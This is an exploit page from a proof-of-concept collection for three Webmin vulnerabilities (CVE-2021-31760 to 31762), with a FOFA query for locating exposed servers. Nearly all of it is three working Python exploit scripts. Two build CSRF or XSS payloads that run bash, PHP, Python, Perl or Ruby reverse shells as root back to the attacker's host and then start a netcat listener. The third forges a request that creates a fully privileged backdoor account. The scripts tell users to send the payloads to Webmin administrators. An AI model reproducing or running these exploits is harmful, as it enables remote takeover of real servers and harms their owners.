Awesome-POC/Web应用漏洞/Webmin 多个高危漏洞 CVE-2021-31760~62.md

# Webmin 多个高危漏洞 CVE-2021-31760~62

## 漏洞描述

CVE-2021-31760:利用CSRF攻击，实现对Webmin的远程命令执行。

CVE-2021-31761:利用XSS攻击，实现对Webmin的远程命令执行。

CVE-2021-31762:利用CSRF攻击，通过Webmin的添加用户功能创建特权用户，然后通过特权用户权限反弹shell。

参考链接：

- CVE-2021-31760：https://github.com/electronicbots/CVE-2021-31760
- CVE-2021-31761：https://github.com/electronicbots/CVE-2021-31761
- CVE-2021-31762：https://github.com/electronicbots/CVE-2021-31762

## 漏洞影响

```
Webmin <= 1.973
```

## FOFA

```
app="Webmin"
```

## 漏洞复现

CVE-2021-31760 poc：

```python
import time, subprocess,random

print('''\033[1;37m

 __  __           _     ____  _          _________  _     _            _    
|  \/  |         | |   |___ \| |        |___  / _ \| |   | |          | |   
| \  / | ___  ___| |__   __) | |           / / | | | | __| |_   _  ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| |          / /| | | | |/ _` | | | |/ __| |/ /
| |  | |  __/\__ \ | | |___) | |  _ _    / /_| |_| | | (_| | |_| | (__|   < 
|_|  |_|\___||___/_| |_|____/|_| (_|_)  /_____\___/|_|\__,_|\__, |\___|_|\_/
                                                             __/ |          
                                                            |___/           

    \033[1;m''')

for i in range(101):
    print(
        "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m )  & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m  ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
            i), "\033[1;36m%\033[1;m", end="")
    time.sleep(0.02)
print("\n\n")

target = input(
    "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")

if target.endswith('/'):
    target = target + 'proc/run.cgi'
else:
    target = target + '/proc/run.cgi'

ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")

port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")

ReverseShell = input \
('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m

\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')

file_name = random.randrange(1000)

if ReverseShell == '1':
    ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''

elif ReverseShell == '2':
    ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''

elif ReverseShell == '3':
    ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''

elif ReverseShell == '4':
    ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''

elif ReverseShell == '5':
    ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''

else:
    print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")


def CSRF_Generator():
    with open('CSRF_POC.html', 'w') as POC:
        POC.write \
            ('''

<html>
        <head>
            <meta name="referrer" content="never">
        </head>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="''' + target +'''" method="POST">
      <input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
      <input type="hidden" name="mode" value="0" />
      <input type="hidden" name="user" value="root" />
      <input type="hidden" name="input" value="" />
      <input type="hidden" name="undefined" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>

</html>

    ''')
    POC.close()

    print(
        "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and wait for your Reverse Shell ^_^ \n \033[1;m")


def Netcat_listener():
    print()
    subprocess.run(["nc", "-nlvp "+port+""])


def main():
    CSRF_Generator()
    Netcat_listener()


if __name__ == '__main__':
    main()
```

CVE-2021-31761 poc：

```python
import time, subprocess,random,urllib.parse


print('''\033[1;37m

 __  __           _     ____  _          _________  _     _            _    
|  \/  |         | |   |___ \| |        |___  / _ \| |   | |          | |   
| \  / | ___  ___| |__   __) | |           / / | | | | __| |_   _  ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| |          / /| | | | |/ _` | | | |/ __| |/ /
| |  | |  __/\__ \ | | |___) | |  _ _    / /_| |_| | | (_| | |_| | (__|   < 
|_|  |_|\___||___/_| |_|____/|_| (_|_)  /_____\___/|_|\__,_|\__, |\___|_|\_/
                                                             __/ |          
                                                            |___/           

    \033[1;m''')

for i in range(101):
    print(
        "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m )  & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m  ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
            i), "\033[1;36m%\033[1;m", end="")
    time.sleep(0.02)
print("\n\n")

target = input(
    "\033[1;36m \n Please input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")

if target.endswith('/'):
    target = target + 'tunnel/link.cgi/'
else:
    target = target + '/tunnel/link.cgi/'

ip = input("\033[1;36m \n Please input ur IP to set up the Reverse Shell e.g. ( 10.10.10.10 ) > \033[1;m")

port = input("\033[1;36m \n Please input a Port to set up the Reverse Shell e.g. ( 1337 ) > \033[1;m")

ReverseShell = input \
('''\033[1;37m
\n
1- Bash Reverse Shell \n
2- PHP Reverse Shell \n
3- Python Reverse Shell \n
4- Perl Reverse Shell \n
5- Ruby Reverse Shell \n
\033[1;m

\033[1;36mPlease insert the number Reverse Shell's type u want e.g. ( 1 ) > \033[1;m''')

file_name = random.randrange(1000)

if ReverseShell == '1':
    ReverseShell = 'mkfifo /tmp/'+str(file_name)+'; nc '+ip+' '+port+' 0</tmp/'+str(file_name)+' | /bin/sh >/tmp/'+str(file_name)+' 2>&1; rm /tmp/'+str(file_name)+''

elif ReverseShell == '2':
    ReverseShell = ''' php -r '$sock=fsockopen("''' + ip + '''",''' + port + ''');exec("/bin/sh -i <&3 >&3 2>&3");' '''

elif ReverseShell == '3':
    ReverseShell = ''' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("''' + ip + '''",''' + port + '''));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' '''

elif ReverseShell == '4':
    ReverseShell = ''' perl -e 'use Socket;$i="''' + ip + '''";$p=''' + port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '''

elif ReverseShell == '5':
    ReverseShell = ''' ruby -rsocket -e'f=TCPSocket.open("''' + ip + '''",''' + port + ''').to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' '''

else:
    print("\033[1;36m \n Please Re-Check ur input :( \033[1;m \n")


def CSRF_Generator():
    Payload = urllib.parse.quote('''

<html>
        <head>
            <meta name="referrer" content="never">
        </head>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="/proc/run.cgi" method="POST">
      <input type="hidden" name="cmd" value="''' + ReverseShell + '''" />
      <input type="hidden" name="mode" value="0" />
      <input type="hidden" name="user" value="root" />
      <input type="hidden" name="input" value="" />
      <input type="hidden" name="undefined" value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>

</html>

        ''')

    print("\033[1;36m\nHere's ur link , send it to a Webmin's Admin and wait for ur Reverse Shell ^_^ \n \n\033[1;m")

    print(target+Payload)

def Netcat_listener():
    print()
    subprocess.run(["nc", "-nlvp "+port+""])


def main():
    CSRF_Generator()
    Netcat_listener()


if __name__ == '__main__':
    main()
```

CVE-2021-31762 poc：

```python
import time

print('''\033[1;37m

 __  __           _     ____  _          _________  _     _            _    
|  \/  |         | |   |___ \| |        |___  / _ \| |   | |          | |   
| \  / | ___  ___| |__   __) | |           / / | | | | __| |_   _  ___| | __
| |\/| |/ _ \/ __| '_ \ |__ <| |          / /| | | | |/ _` | | | |/ __| |/ /
| |  | |  __/\__ \ | | |___) | |  _ _    / /_| |_| | | (_| | |_| | (__|   < 
|_|  |_|\___||___/_| |_|____/|_| (_|_)  /_____\___/|_|\__,_|\__, |\___|_|\_/
                                                             __/ |          
                                                            |___/           

    \033[1;m''')

for i in range(101):
    print(
        "\r\033[1;36m [>] POC By \033[1;m \033[1;37mMesh3l\033[1;m \033[1;36m ( \033[1;m\033[1;37m@Mesh3l_911\033[1;m\033[1;36m )  & \033[1;m \033[1;37mZ0ldyck\033[1;m\033[1;36m  ( \033[1;m\033[1;37m@electronicbots\033[1;m\033[1;36m ) \033[1;m {} \033[1;m".format(
            i), "\033[1;36m%\033[1;m", end="")
    time.sleep(0.02)
print("\n\n")

target = input(
    "\033[1;36m \nPlease input ur target's webmin path e.g. ( https://webmin.Mesh3l-Mohammed.com/ ) > \033[1;m")

if target.endswith('/'):
    target = target + 'acl/save_user.cgi'
else:
    target = target + '/acl/save_user.cgi'


def CSRF_Generator():
    with open('CSRF_POC.html', 'w') as POC:
        POC.write \
            ('''

<html>
        <head>
            <meta name="referrer" content="never">
        </head>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="'''+target+'''" method="POST">
      <input type="hidden" name="safe" value="" />
      <input type="hidden" name="name" value="Mesh3l&#95;Z0ldyck" />
      <input type="hidden" name="pass&#95;def" value="0" />
      <input type="hidden" name="pass" value="Mesh3l&#95;Z0ldyck123" />
      <input type="hidden" name="real" value="Mesh3l&#95;Z0ldyck" />
      <input type="hidden" name="cert&#95;def" value="1" />
      <input type="hidden" name="lang&#95;def" value="1" />
      <input type="hidden" name="lang" value="af" />
      <input type="hidden" name="notabs" value="0" />
      <input type="hidden" name="theme&#95;def" value="1" />
      <input type="hidden" name="theme" value="" />
      <input type="hidden" name="overlay&#95;def" value="1" />
      <input type="hidden" name="overlay" value="overlay&#45;theme" />
      <input type="hidden" name="logouttime&#95;def" value="1" />
      <input type="hidden" name="minsize&#95;def" value="1" />
      <input type="hidden" name="ipmode" value="0" />
      <input type="hidden" name="ips" value="" />
      <input type="hidden" name="days&#95;def" value="1" />
      <input type="hidden" name="hours&#95;def" value="1" />
      <input type="hidden" name="hours&#95;hfrom" value="" />
      <input type="hidden" name="hours&#95;mfrom" value="" />
      <input type="hidden" name="hours&#95;hto" value="" />
      <input type="hidden" name="hours&#95;mto" value="" />
      <input type="hidden" name="mod" value="backup&#45;config" />
      <input type="hidden" name="mod" value="change&#45;user" />
      <input type="hidden" name="mod" value="webmincron" />
      <input type="hidden" name="mod" value="usermin" />
      <input type="hidden" name="mod" value="webminlog" />
      <input type="hidden" name="mod" value="webmin" />
      <input type="hidden" name="mod" value="help" />
      <input type="hidden" name="mod" value="servers" />
      <input type="hidden" name="mod" value="acl" />
      <input type="hidden" name="mod" value="bacula&#45;backup" />
      <input type="hidden" name="mod" value="init" />
      <input type="hidden" name="mod" value="passwd" />
      <input type="hidden" name="mod" value="quota" />
      <input type="hidden" name="mod" value="mount" />
      <input type="hidden" name="mod" value="fsdump" />
      <input type="hidden" name="mod" value="ldap&#45;client" />
      <input type="hidden" name="mod" value="ldap&#45;useradmin" />
      <input type="hidden" name="mod" value="logrotate" />
      <input type="hidden" name="mod" value="mailcap" />
      <input type="hidden" name="mod" value="mon" />
      <input type="hidden" name="mod" value="pam" />
      <input type="hidden" name="mod" value="certmgr" />
      <input type="hidden" name="mod" value="proc" />
      <input type="hidden" name="mod" value="at" />
      <input type="hidden" name="mod" value="cron" />
      <input type="hidden" name="mod" value="sentry" />
      <input type="hidden" name="mod" value="man" />
      <input type="hidden" name="mod" value="syslog" />
      <input type="hidden" name="mod" value="syslog&#45;ng" />
      <input type="hidden" name="mod" value="system&#45;status" />
      <input type="hidden" name="mod" value="useradmin" />
      <input type="hidden" name="mod" value="apache" />
      <input type="hidden" name="mod" value="bind8" />
      <input type="hidden" name="mod" value="pserver" />
      <input type="hidden" name="mod" value="dhcpd" />
      <input type="hidden" name="mod" value="dhcp&#45;dns" />
      <input type="hidden" name="mod" value="dovecot" />
      <input type="hidden" name="mod" value="exim" />
      <input type="hidden" name="mod" value="fetchmail" />
      <input type="hidden" name="mod" value="foobar" />
      <input type="hidden" name="mod" value="frox" />
      <input type="hidden" name="mod" value="jabber" />
      <input type="hidden" name="mod" value="ldap&#45;server" />
      <input type="hidden" name="mod" value="majordomo" />
      <input type="hidden" name="mod" value="htpasswd&#45;file" />
      <input type="hidden" name="mod" value="minecraft" />
      <input type="hidden" name="mod" value="mysql" />
      <input type="hidden" name="mod" value="openslp" />
      <input type="hidden" name="mod" value="postfix" />
      <input type="hidden" name="mod" value="postgresql" />
      <input type="hidden" name="mod" value="proftpd" />
      <input type="hidden" name="mod" value="procmail" />
      <input type="hidden" name="mod" value="qmailadmin" />
      <input type="hidden" name="mod" value="mailboxes" />
      <input type="hidden" name="mod" value="sshd" />
      <input type="hidden" name="mod" value="samba" />
      <input type="hidden" name="mod" value="sendmail" />
      <input type="hidden" name="mod" value="spam" />
      <input type="hidden" name="mod" value="squid" />
      <input type="hidden" name="mod" value="sarg" />
      <input type="hidden" name="mod" value="wuftpd" />
      <input type="hidden" name="mod" value="webalizer" />
      <input type="hidden" name="mod" value="link" />
      <input type="hidden" name="mod" value="adsl&#45;client" />
      <input type="hidden" name="mod" value="bandwidth" />
      <input type="hidden" name="mod" value="fail2ban" />
      <input type="hidden" name="mod" value="firewalld" />
      <input type="hidden" name="mod" value="ipsec" />
      <input type="hidden" name="mod" value="krb5" />
      <input type="hidden" name="mod" value="firewall" />
      <input type="hidden" name="mod" value="firewall6" />
      <input type="hidden" name="mod" value="exports" />
      <input type="hidden" name="mod" value="exports&#45;nfs4" />
      <input type="hidden" name="mod" value="xinetd" />
      <input type="hidden" name="mod" value="inetd" />
      <input type="hidden" name="mod" value="pap" />
      <input type="hidden" name="mod" value="ppp&#45;client" />
      <input type="hidden" name="mod" value="pptp&#45;client" />
      <input type="hidden" name="mod" value="pptp&#45;server" />
      <input type="hidden" name="mod" value="stunnel" />
      <input type="hidden" name="mod" value="shorewall" />
      <input type="hidden" name="mod" value="shorewall6" />
      <input type="hidden" name="mod" value="itsecur&#45;firewall" />
      <input type="hidden" name="mod" value="tcpwrappers" />
      <input type="hidden" name="mod" value="idmapd" />
      <input type="hidden" name="mod" value="filter" />
      <input type="hidden" name="mod" value="burner" />
      <input type="hidden" name="mod" value="grub" />
      <input type="hidden" name="mod" value="lilo" />
      <input type="hidden" name="mod" value="raid" />
      <input type="hidden" name="mod" value="lvm" />
      <input type="hidden" name="mod" value="fdisk" />
      <input type="hidden" name="mod" value="lpadmin" />
      <input type="hidden" name="mod" value="smart&#45;status" />
      <input type="hidden" name="mod" value="time" />
      <input type="hidden" name="mod" value="vgetty" />
      <input type="hidden" name="mod" value="iscsi&#45;client" />
      <input type="hidden" name="mod" value="iscsi&#45;server" />
      <input type="hidden" name="mod" value="iscsi&#45;tgtd" />
      <input type="hidden" name="mod" value="iscsi&#45;target" />
      <input type="hidden" name="mod" value="cluster&#45;passwd" />
      <input type="hidden" name="mod" value="cluster&#45;copy" />
      <input type="hidden" name="mod" value="cluster&#45;cron" />
      <input type="hidden" name="mod" value="cluster&#45;shell" />
      <input type="hidden" name="mod" value="cluster&#45;shutdown" />
      <input type="hidden" name="mod" value="cluster&#45;usermin" />
      <input type="hidden" name="mod" value="cluster&#45;useradmin" />
      <input type="hidden" name="mod" value="cluster&#45;webmin" />
      <input type="hidden" name="mod" value="cfengine" />
      <input type="hidden" name="mod" value="heartbeat" />
      <input type="hidden" name="mod" value="shell" />
      <input type="hidden" name="mod" value="custom" />
      <input type="hidden" name="mod" value="disk&#45;usage" />
      <input type="hidden" name="mod" value="export&#45;test" />
      <input type="hidden" name="mod" value="ftelnet" />
      <input type="hidden" name="mod" value="filemin" />
      <input type="hidden" name="mod" value="flashterm" />
      <input type="hidden" name="mod" value="tunnel" />
      <input type="hidden" name="mod" value="file" />
      <input type="hidden" name="mod" value="phpini" />
      <input type="hidden" name="mod" value="cpan" />
      <input type="hidden" name="mod" value="htaccess&#45;htpasswd" />
      <input type="hidden" name="mod" value="telnet" />
      <input type="hidden" name="mod" value="ssh" />
      <input type="hidden" name="mod" value="ssh2" />
      <input type="hidden" name="mod" value="shellinabox" />
      <input type="hidden" name="mod" value="status" />
      <input type="hidden" name="mod" value="ajaxterm" />
      <input type="hidden" name="mod" value="updown" />
      <input type="hidden" name="mod" value="vnc" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>


    ''')
    POC.close()

    print(
        "\033[1;36m\nThe CSRF_POC has been generated successfully , send it to a Webmin's Admin and ur privileged user creds would be \n\nUsername: \033[1;m\033[1;37mMesh3l_Z0ldyck\033[1;m\n\033[1;36mPassword:\033[1;m \033[1;37mMesh3l_Z0ldyck123\n\033[1;m\n\n\033[1;36mHappy Hunting ^_^ \n\033[1;m")



def main():
    CSRF_Generator()


if __name__ == '__main__':
    main()
```